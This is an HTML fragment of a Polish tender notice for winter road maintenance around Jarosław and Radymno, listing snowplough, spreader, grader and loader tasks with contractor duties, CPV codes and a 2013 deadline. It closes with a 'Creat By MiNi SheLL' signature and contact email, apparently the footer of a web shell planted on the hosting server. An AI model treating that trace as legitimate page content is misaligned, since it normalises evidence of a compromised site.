<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2-   gmina Pawłosiów i Jarosław -  Nośnik   o ładowności min. 8 ton  wyposażony w    pług odśnieżny jednostronny ,   pług odśnieżny dwustronny  oraz   rozsypywarkę  o pojemności zasobnika min 4 m3 lub większa. Całość stanowi własność Wykonawcy ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Powyższe usługi polegać będą na:      
1) świadczeniu usług w zakresie zimowego utrzymania dróg  wymienionych ,zgodnie z Planem Zimowego Utrzymania Dróg opracowanym przez Zamawiającego, zawartym w Rozdziale III    SIWZ
              we wszystkie dni tygodnia w niekorzystnych warunkach atmosferycznych ( niskie temperatury zawieje i zamiecie śnieżne ) na wezwanie i według potrzeb  Zamawiającego ,
 2)   zapewnieniu jakości wykonywanych usług odpowiadających obowiązującym standardom zimowego utrzymania dróg ( uzyskanie stanu nawierzchni obowiązującego dla standardu w którym utrzymywana jest droga), ustalonych przez Zamawiającego w Planie zimowego utrzymania dróg zawartego w Rozdziale III    SIWZ
  3)   przekazywanie  za pośrednictwem osób obsługujących pojazdy i sprzęt   przedstawicielom Zamawiającego informacji o aktualnym stanie przejezdności dróg,  czasie rozpoczęcia i zakończenia wykonywania usług na poszczególnych odcinkach dróg oraz  zagrożeniach spowodowanych aktualnymi warunkami atmosferycznymi.
  4)  zabezpieczeniu we własnym zakresie i na własny koszt  materiały do zwalczania śliskości tj. mieszankę 
       piaskowo-solną      w ilościach szczegółowo określonych w Rozdziale  III   
        SIWZ. Załadunek materiałów odbywać się będzie sprzętem Wykonawcy i na jego koszt ,
  5) utrzymaniu w gotowości sprzętu i urządzeń przewidzianych do realizacji przedmiotu zamówienia wraz z ich 
     obsługą, a w przypadku awarii dokonać podmiany uszkodzonego sprzętu na sprawny technicznie .
  6) zapewnieniu przez wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do 
       świadczenia usług przy zimowym utrzymaniu dróg, 
  7)   udostępnienia   Zamawiającemu zaoferowanych  w ofercie  pojazdów nośników do świadczenia usług przy zimowym utrzymaniu dróg , w celu zamontowania urządzeń monitorujących GPS. Urządzenia stanowią własność Zamawiającego.  Wykonawca ponosi pełną odpowiedzialność za wszelkie uszkodzenia tych urządzeń powstałych z winy niewłaściwego ich użytkowania bądź regulowania bez wiedzy i zgody Właściciela tych urządzeń.  
 4. Szczegółowy opis przedmiotu zamówienia zawiera Plan zimowego utrzymania dróg zawarty w Rozdziale III  
       SIWZ ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3-  gmina  Radymno -  Nośnik   o ładowności min.  8 ton  wyposażony w    pług odśnieżny  jednostronny ,   pług odśnieżny  dwustronny  oraz   rozsypywarkę  o pojemności zasobnika min 4 m3 lub większą. Całość stanowi własność Wykonawcy ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Powyższe usługi polegać będą na:      
1) świadczeniu usług w zakresie zimowego utrzymania dróg  wymienionych ,zgodnie z Planem Zimowego Utrzymania Dróg opracowanym przez Zamawiającego, zawartym w Rozdziale III    SIWZ
              we wszystkie dni tygodnia w niekorzystnych warunkach atmosferycznych ( niskie temperatury zawieje i zamiecie śnieżne ) na wezwanie i według potrzeb  Zamawiającego ,
 2)   zapewnieniu jakości wykonywanych usług odpowiadających obowiązującym standardom zimowego utrzymania dróg ( uzyskanie stanu nawierzchni obowiązującego dla standardu w którym utrzymywana jest droga), ustalonych przez Zamawiającego w Planie zimowego utrzymania dróg zawartego w Rozdziale III     SIWZ
  3)   przekazywanie  za pośrednictwem osób obsługujących pojazdy i sprzęt   przedstawicielom Zamawiającego informacji o aktualnym stanie przejezdności dróg,  czasie rozpoczęcia i zakończenia wykonywania usług na poszczególnych odcinkach dróg oraz  zagrożeniach spowodowanych aktualnymi warunkami atmosferycznymi.
  4)  zabezpieczeniu we własnym zakresie i na własny koszt  materiały do zwalczania śliskości tj. mieszankę 
       piaskowo-solną      w ilościach szczegółowo określonych w Rozdziale  III           SIWZ. Załadunek materiałów odbywać się będzie sprzętem Wykonawcy i na jego koszt ,
  5) utrzymaniu w gotowości sprzętu i urządzeń przewidzianych do realizacji przedmiotu zamówienia wraz z ich 
     obsługą, a w przypadku awarii dokonać podmiany uszkodzonego sprzętu na sprawny technicznie .
  6) zapewnieniu przez wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do 
       świadczenia usług przy zimowym utrzymaniu dróg, 
  7)   udostępnienia   Zamawiającemu zaoferowanych  w ofercie  pojazdów/ nośników do świadczenia usług przy zimowym utrzymaniu dróg , w celu zamontowania urządzeń monitorujących GPS. Urządzenia stanowią własność Zamawiającego.  Wykonawca ponosi pełną odpowiedzialność za wszelkie uszkodzenia tych urządzeń powstałych z winy niewłaściwego ich użytkowania bądź regulowania bez wiedzy i zgody Właściciela tych urządzeń.  
 4. Szczegółowy opis przedmiotu zamówienia zawiera Plan zimowego utrzymania dróg zawarty w Rozdziale III  
       SIWZ ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4-   gmina Rokietnica i Chłopice - Nośnik   o ładowności min. 8 ton  wyposażony w    pług odśnieżny jednostronny ,   pług odśnieżny dwustronny  oraz   rozsypywarkę  o pojemności zasobnika min 4 m3 lub większa. Całość stanowi własność Wykonawcy ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Powyższe usługi polegać będą na:      
1) świadczeniu usług w zakresie zimowego utrzymania dróg  wymienionych ,zgodnie z Planem Zimowego Utrzymania Dróg opracowanym przez Zamawiającego, zawartym w Rozdziale III    SIWZ
              we wszystkie dni tygodnia w niekorzystnych warunkach atmosferycznych ( niskie temperatury zawieje i zamiecie śnieżne ) na wezwanie i według potrzeb  Zamawiającego ,
 2)   zapewnieniu jakości wykonywanych usług odpowiadających obowiązującym standardom zimowego utrzymania dróg ( uzyskanie stanu nawierzchni obowiązującego dla standardu w którym utrzymywana jest droga), ustalonych przez Zamawiającego w Planie zimowego utrzymania dróg zawartego w Rozdziale III     SIWZ
  3)   przekazywanie  za pośrednictwem osób obsługujących pojazdy i sprzęt   przedstawicielom Zamawiającego informacji o aktualnym stanie przejezdności dróg,  czasie rozpoczęcia i zakończenia wykonywania usług na poszczególnych odcinkach dróg oraz  zagrożeniach spowodowanych aktualnymi warunkami atmosferycznymi.
  4)  zabezpieczeniu we własnym zakresie i na własny koszt  materiały do zwalczania śliskości tj. mieszankę 
       piaskowo-solną      w ilościach szczegółowo określonych w Rozdziale  III           SIWZ. Załadunek materiałów odbywać się będzie sprzętem Wykonawcy i na jego koszt ,
  5) utrzymaniu w gotowości sprzętu i urządzeń przewidzianych do realizacji przedmiotu zamówienia wraz z ich 
     obsługą, a w przypadku awarii dokonać podmiany uszkodzonego sprzętu na sprawny technicznie .
  6) zapewnieniu przez wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do 
       świadczenia usług przy zimowym utrzymaniu dróg, 
  7)   udostępnienia   Zamawiającemu zaoferowanych  w ofercie  pojazdów/ nośników do świadczenia usług przy zimowym utrzymaniu dróg , w celu zamontowania urządzeń monitorujących GPS. Urządzenia stanowią własność Zamawiającego.  Wykonawca ponosi pełną odpowiedzialność za wszelkie uszkodzenia tych urządzeń powstałych z winy niewłaściwego ich użytkowania bądź regulowania bez wiedzy i zgody Właściciela tych urządzeń.  
 4. Szczegółowy opis przedmiotu zamówienia zawiera Plan zimowego utrzymania dróg zawarty w Rozdziale III  
       SIWZ ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5-   gmina Pruchnik i Rożwienica -  Nośnik   o ładowności min. 8 ton  wyposażony w    pług odśnieżny jednostronny ,   pług odśnieżny dwustronny  oraz   rozsypywarkę  o pojemności zasobnika min 4 m3 lub większą. Całość stanowi własność Wykonawcy ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Powyższe usługi polegać będą na:      
1) świadczeniu usług w zakresie zimowego utrzymania dróg  wymienionych ,zgodnie z Planem Zimowego Utrzymania Dróg opracowanym przez Zamawiającego, zawartym w Rozdziale III    SIWZ
              we wszystkie dni tygodnia w niekorzystnych warunkach atmosferycznych ( niskie temperatury zawieje i zamiecie śnieżne ) na wezwanie i według potrzeb  Zamawiającego ,
 2)   zapewnieniu jakości wykonywanych usług odpowiadających obowiązującym standardom zimowego utrzymania dróg ( uzyskanie stanu nawierzchni obowiązującego dla standardu w którym utrzymywana jest droga), ustalonych przez Zamawiającego w Planie zimowego utrzymania dróg zawartego w Rozdziale III     SIWZ
  3)   przekazywanie  za pośrednictwem osób obsługujących pojazdy i sprzęt   przedstawicielom Zamawiającego informacji o aktualnym stanie przejezdności dróg,  czasie rozpoczęcia i zakończenia wykonywania usług na poszczególnych odcinkach dróg oraz  zagrożeniach spowodowanych aktualnymi warunkami atmosferycznymi.
  4)  zabezpieczeniu we własnym zakresie i na własny koszt  materiały do zwalczania śliskości tj. mieszankę 
       piaskowo-solną      w ilościach szczegółowo określonych w Rozdziale  III           SIWZ. Załadunek materiałów odbywać się będzie sprzętem Wykonawcy i na jego koszt ,
  5) utrzymaniu w gotowości sprzętu i urządzeń przewidzianych do realizacji przedmiotu zamówienia wraz z ich 
     obsługą, a w przypadku awarii dokonać podmiany uszkodzonego sprzętu na sprawny technicznie .
  6) zapewnieniu przez wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do 
       świadczenia usług przy zimowym utrzymaniu dróg, 
  7)   udostępnienia   Zamawiającemu zaoferowanych  w ofercie  pojazdów/ nośników do świadczenia usług przy zimowym utrzymaniu dróg , w celu zamontowania urządzeń monitorujących GPS. Urządzenia stanowią własność Zamawiającego.  Wykonawca ponosi pełną odpowiedzialność za wszelkie uszkodzenia tych urządzeń powstałych z winy niewłaściwego ich użytkowania bądź regulowania bez wiedzy i zgody Właściciela tych urządzeń.  
 4. Szczegółowy opis przedmiotu zamówienia zawiera Plan zimowego utrzymania dróg zawarty w Rozdziale III  
       SIWZ ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6-   miasto Jarosław-  Dwa Nośniki   o ładowności do 8 ton  wyposażone w  dwa  pługi odśnieżne jednostronne sterowane z kabiny operatora z możliwością zmiany kąta ataku    oraz  dwie rozsypywarki sterowane elektronicznie o pojemności zasobnika min 4 m3 lub większą oraz ciągnik   typu średniego wyposażony w pług odśnieżny jednostronny oraz rozsypywarkę do 4 m3 lub większą  Całość stanowi własność Wykonawcy ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Powyższe usługi polegać będą na:      
1) świadczeniu usług w zakresie zimowego utrzymania dróg  wymienionych ,zgodnie z Planem Zimowego Utrzymania Dróg opracowanym przez Zamawiającego, zawartym w Rozdziale III    SIWZ
              we wszystkie dni tygodnia w niekorzystnych warunkach atmosferycznych ( niskie temperatury zawieje i zamiecie śnieżne ) na wezwanie i według potrzeb  Zamawiającego ,
 2)   zapewnieniu jakości wykonywanych usług odpowiadających obowiązującym standardom zimowego utrzymania dróg ( uzyskanie stanu nawierzchni obowiązującego dla standardu w którym utrzymywana jest droga), ustalonych przez Zamawiającego w Planie zimowego utrzymania dróg zawartego w Rozdziale III     SIWZ
  3)   przekazywanie  za pośrednictwem osób obsługujących pojazdy i sprzęt   przedstawicielom Zamawiającego informacji o aktualnym stanie przejezdności dróg,  czasie rozpoczęcia i zakończenia wykonywania usług na poszczególnych odcinkach dróg oraz  zagrożeniach spowodowanych aktualnymi warunkami atmosferycznymi.
  4)  zabezpieczeniu we własnym zakresie i na własny koszt  materiały do zwalczania śliskości tj. mieszankę 
       piaskowo-solną      w ilościach szczegółowo określonych w Rozdziale  III           SIWZ. Załadunek materiałów odbywać się będzie sprzętem Wykonawcy i na jego koszt ,
  5) utrzymaniu w gotowości sprzętu i urządzeń przewidzianych do realizacji przedmiotu zamówienia wraz z ich 
     obsługą, a w przypadku awarii dokonać podmiany uszkodzonego sprzętu na sprawny technicznie .
  6) zapewnieniu przez wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do 
       świadczenia usług przy zimowym utrzymaniu dróg, 
  7)   udostępnienia   Zamawiającemu zaoferowanych  w ofercie  pojazdów/ nośników do świadczenia usług przy zimowym utrzymaniu dróg , w celu zamontowania urządzeń monitorujących GPS. Urządzenia stanowią własność Zamawiającego.  Wykonawca ponosi pełną odpowiedzialność za wszelkie uszkodzenia tych urządzeń powstałych z winy niewłaściwego ich użytkowania bądź regulowania bez wiedzy i zgody Właściciela tych urządzeń.  
 4. Szczegółowy opis przedmiotu zamówienia zawiera Plan zimowego utrzymania dróg zawarty w Rozdziale III  
       SIWZ ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 - miasto Radymno - Nośnik o ładowności do 6 ton  lub ciągnik typu średniego wyposażony w pług odśnieżny jednostronny oraz rozsypywarkę o pojemności zasobnika do 4 m3 .   Całość stanowi własność Wykonawcy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Powyższe usługi polegać będą na:      
1) świadczeniu usług w zakresie zimowego utrzymania dróg  wymienionych ,zgodnie z Planem Zimowego Utrzymania Dróg opracowanym przez Zamawiającego, zawartym w Rozdziale III    SIWZ
              we wszystkie dni tygodnia w niekorzystnych warunkach atmosferycznych ( niskie temperatury zawieje i zamiecie śnieżne ) na wezwanie i według potrzeb  Zamawiającego ,
 2)   zapewnieniu jakości wykonywanych usług odpowiadających obowiązującym standardom zimowego utrzymania dróg ( uzyskanie stanu nawierzchni obowiązującego dla standardu w którym utrzymywana jest droga), ustalonych przez Zamawiającego w Planie zimowego utrzymania dróg zawartego w Rozdziale III    SIWZ
  3)   przekazywanie  za pośrednictwem osób obsługujących pojazdy i sprzęt   przedstawicielom Zamawiającego informacji o aktualnym stanie przejezdności dróg,  czasie rozpoczęcia i zakończenia wykonywania usług na poszczególnych odcinkach dróg oraz  zagrożeniach spowodowanych aktualnymi warunkami atmosferycznymi.
  4)  zabezpieczeniu we własnym zakresie i na własny koszt  materiały do zwalczania śliskości tj. mieszankę 
       piaskowo-solną      w ilościach szczegółowo określonych w Rozdziale  III   
        SIWZ. Załadunek materiałów odbywać się będzie sprzętem Wykonawcy i na jego koszt ,
  5) utrzymaniu w gotowości sprzętu i urządzeń przewidzianych do realizacji przedmiotu zamówienia wraz z ich 
     obsługą, a w przypadku awarii dokonać podmiany uszkodzonego sprzętu na sprawny technicznie .
  6) zapewnieniu przez wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do 
       świadczenia usług przy zimowym utrzymaniu dróg, 
  7)   udostępnienia   Zamawiającemu zaoferowanych  w ofercie  pojazdów nośników do świadczenia usług przy zimowym utrzymaniu dróg , w celu zamontowania urządzeń monitorujących GPS. Urządzenia stanowią własność Zamawiającego.  Wykonawca ponosi pełną odpowiedzialność za wszelkie uszkodzenia tych urządzeń powstałych z winy niewłaściwego ich użytkowania bądź regulowania bez wiedzy i zgody Właściciela tych urządzeń.  
 4. Szczegółowy opis przedmiotu zamówienia zawiera Plan zimowego utrzymania dróg zawarty w Rozdziale III  
       SIWZ ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie   Nr 8 pług ciężki-   Nośnik    o ładowności powyżej 12 ton wyposażony w   pług odśnieżny dwustronny  typ ciężki  . Całość stanowi własność Wykonawcy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Powyższe usługi polegać będą na:      
1) świadczeniu usług w zakresie zimowego utrzymania dróg  wymienionych ,zgodnie z Planem Zimowego Utrzymania Dróg opracowanym przez Zamawiającego, zawartym w Rozdziale III     SIWZ
              we wszystkie dni tygodnia w niekorzystnych warunkach atmosferycznych ( niskie temperatury zawieje i zamiecie śnieżne ) na wezwanie i według potrzeb  Zamawiającego ,
 2)   zapewnieniu jakości wykonywanych usług odpowiadających obowiązującym standardom zimowego utrzymania dróg ( uzyskanie stanu nawierzchni obowiązującego dla standardu w którym utrzymywana jest droga), ustalonych przez Zamawiającego w Planie zimowego utrzymania dróg zawartego w Rozdziale III     SIWZ
  3)   przekazywanie  za pośrednictwem osób obsługujących pojazdy i sprzęt   przedstawicielom Zamawiającego informacji o aktualnym stanie przejezdności dróg,  czasie rozpoczęcia i zakończenia wykonywania usług na poszczególnych odcinkach dróg oraz  zagrożeniach spowodowanych aktualnymi warunkami atmosferycznymi.
           4) utrzymaniu w gotowości sprzętu i urządzeń przewidzianych do realizacji przedmiotu zamówienia wraz z ich 

     obsługą, a w przypadku awarii dokonać podmiany uszkodzonego sprzętu na sprawny technicznie .
  5) zapewnieniu przez wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do 
       świadczenia usług przy zimowym utrzymaniu dróg, 
   2. Szczegółowy opis przedmiotu zamówienia zawiera Plan zimowego utrzymania dróg zawarty w Rozdziale III  
       SIWZ ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie Nr 9 równiarka-   o mocy powyżej 100 KM wyposażona w  pług dwustronny czołowy . Całość stanowi własność Wykonawcy ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Powyższe usługi polegać będą na:      
1) świadczeniu usług w zakresie zimowego utrzymania dróg  wymienionych ,zgodnie z Planem Zimowego Utrzymania Dróg opracowanym przez Zamawiającego, zawartym w Rozdziale III     SIWZ
              we wszystkie dni tygodnia w niekorzystnych warunkach atmosferycznych ( niskie temperatury zawieje i zamiecie śnieżne ) na wezwanie i według potrzeb  Zamawiającego ,
 2)   zapewnieniu jakości wykonywanych usług odpowiadających obowiązującym standardom zimowego utrzymania dróg ( uzyskanie stanu nawierzchni obowiązującego dla standardu w którym utrzymywana jest droga), ustalonych przez Zamawiającego w Planie zimowego utrzymania dróg zawartego w Rozdziale III     SIWZ
  3)   przekazywanie  za pośrednictwem osób obsługujących pojazdy i sprzęt   przedstawicielom Zamawiającego informacji o aktualnym stanie przejezdności dróg,  czasie rozpoczęcia i zakończenia wykonywania usług na poszczególnych odcinkach dróg oraz  zagrożeniach spowodowanych aktualnymi warunkami atmosferycznymi.
           4) utrzymaniu w gotowości sprzętu i urządzeń przewidzianych do realizacji przedmiotu zamówienia wraz z ich 

     obsługą, a w przypadku awarii dokonać podmiany uszkodzonego sprzętu na sprawny technicznie .
  5) zapewnieniu przez wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do 
       świadczenia usług przy zimowym utrzymaniu dróg, 
   2. Szczegółowy opis przedmiotu zamówienia zawiera Plan zimowego utrzymania dróg zawarty w Rozdziale III  
       SIWZ ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie Nr 10  ładowarka samojezdna kołowa o poj. łyżki min. 0,90 m3.  Własność Wykonawcy ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Powyższe usługi polegać będą na:      
1) świadczeniu usług w zakresie zimowego utrzymania dróg  wymienionych ,zgodnie z Planem Zimowego Utrzymania Dróg opracowanym przez Zamawiającego, zawartym w Rozdziale III     SIWZ
              we wszystkie dni tygodnia w niekorzystnych warunkach atmosferycznych ( niskie temperatury zawieje i zamiecie śnieżne ) na wezwanie i według potrzeb  Zamawiającego ,
 2)   zapewnieniu jakości wykonywanych usług odpowiadających obowiązującym standardom zimowego utrzymania dróg ( uzyskanie stanu nawierzchni obowiązującego dla standardu w którym utrzymywana jest droga), ustalonych przez Zamawiającego w Planie zimowego utrzymania dróg zawartego w Rozdziale III     SIWZ
  3)   przekazywanie  za pośrednictwem osób obsługujących pojazdy i sprzęt   przedstawicielom Zamawiającego informacji o aktualnym stanie przejezdności dróg,  czasie rozpoczęcia i zakończenia wykonywania usług na poszczególnych odcinkach dróg oraz  zagrożeniach spowodowanych aktualnymi warunkami atmosferycznymi.
           4) utrzymaniu w gotowości sprzętu i urządzeń przewidzianych do realizacji przedmiotu zamówienia wraz z ich 

     obsługą, a w przypadku awarii dokonać podmiany uszkodzonego sprzętu na sprawny technicznie .
  5) zapewnieniu przez wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do 
       świadczenia usług przy zimowym utrzymaniu dróg, 
   2. Szczegółowy opis przedmiotu zamówienia zawiera Plan zimowego utrzymania dróg zawarty w Rozdziale III  
       SIWZ ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com